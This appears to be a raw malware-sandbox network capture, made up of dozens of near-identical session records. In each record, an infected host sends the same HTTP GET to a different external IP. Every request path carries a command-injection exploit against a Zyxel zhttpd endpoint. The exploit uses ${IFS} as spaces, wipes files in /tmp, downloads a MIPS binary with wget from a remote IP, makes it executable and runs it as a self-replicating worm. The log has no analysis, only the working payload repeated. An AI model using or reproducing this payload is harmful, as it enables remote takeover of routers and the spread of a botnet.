                                    Jan 13, 2024 19:02:34.182516098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4381192.168.2.135676664.76.195.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182634115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4382192.168.2.1345482181.9.11.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182728052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4383192.168.2.133721632.218.79.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182821035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4384192.168.2.133835235.97.123.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182908058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4385192.168.2.1334742217.93.195.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182985067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4386192.168.2.1346950138.68.33.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183037043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4387192.168.2.135040462.173.221.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183095932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4388192.168.2.133879668.121.84.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183165073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4389192.168.2.134059673.227.243.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183264017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4390192.168.2.133769043.194.80.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183343887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4391192.168.2.133515631.188.184.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183423996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4392192.168.2.135530236.255.26.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183494091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4393192.168.2.1333822167.24.170.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183578014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4394192.168.2.134623078.233.29.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183674097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4395192.168.2.135305076.177.251.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183760881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4396192.168.2.1347106171.229.252.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183864117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4397192.168.2.1335026212.139.187.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.183989048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4398192.168.2.1349892136.227.72.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184046984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4399192.168.2.133424231.124.104.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184160948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4400192.168.2.1351632195.120.82.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184200048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4401192.168.2.133710248.38.65.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184287071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4402192.168.2.1343954138.216.241.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184361935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4403192.168.2.1353784147.122.144.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184437990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4404192.168.2.1333140175.14.96.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184493065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4405192.168.2.133843272.167.4.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184575081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4406192.168.2.133754234.91.11.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184648037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4407192.168.2.1339312164.87.34.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184709072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4408192.168.2.1342162156.139.108.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184763908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4409192.168.2.1333394189.157.5.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184851885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4410192.168.2.135657098.44.204.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.184925079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4411192.168.2.13551108.94.35.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185039043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4412192.168.2.1341182125.46.21.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185081959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4413192.168.2.1334608203.23.206.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185103893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4414192.168.2.134265080.49.141.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185214996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4415192.168.2.1333572116.95.237.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185276985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4416192.168.2.134310024.75.151.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185384035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4417192.168.2.133960853.193.198.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185424089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4418192.168.2.134006668.224.212.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185509920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4419192.168.2.1349324149.83.228.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185576916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4420192.168.2.1350416181.149.26.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185657024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4421192.168.2.1349004116.187.108.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185731888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4422192.168.2.134159468.215.158.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185815096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4423192.168.2.1360258116.110.198.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185909986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4424192.168.2.1337098122.150.48.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.185959101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4425192.168.2.135385042.181.65.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186084032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4426192.168.2.1333060201.240.76.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186140060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4427192.168.2.135650876.98.252.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186242104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4428192.168.2.1349648199.60.78.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186302900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4429192.168.2.135780458.155.104.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186388016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4430192.168.2.1335144121.167.241.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186465025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4431192.168.2.1346718179.135.4.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186527014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4432192.168.2.1352404194.80.6.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186624050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4433192.168.2.1342116149.131.146.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186701059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4434192.168.2.1336262162.190.42.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186753988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4435192.168.2.1354330198.40.40.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186822891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4436192.168.2.1350828180.60.246.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186882973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4437192.168.2.136057696.20.0.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186944008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4438192.168.2.135138477.111.185.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.186997890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4439192.168.2.1342754118.215.106.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187088013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4440192.168.2.1345190199.93.185.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187175989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4441192.168.2.136007877.193.62.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187252045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4442192.168.2.133564837.183.168.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187330008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4443192.168.2.1336902194.230.133.27443
                                    TimestampBytes transferredDirectionData
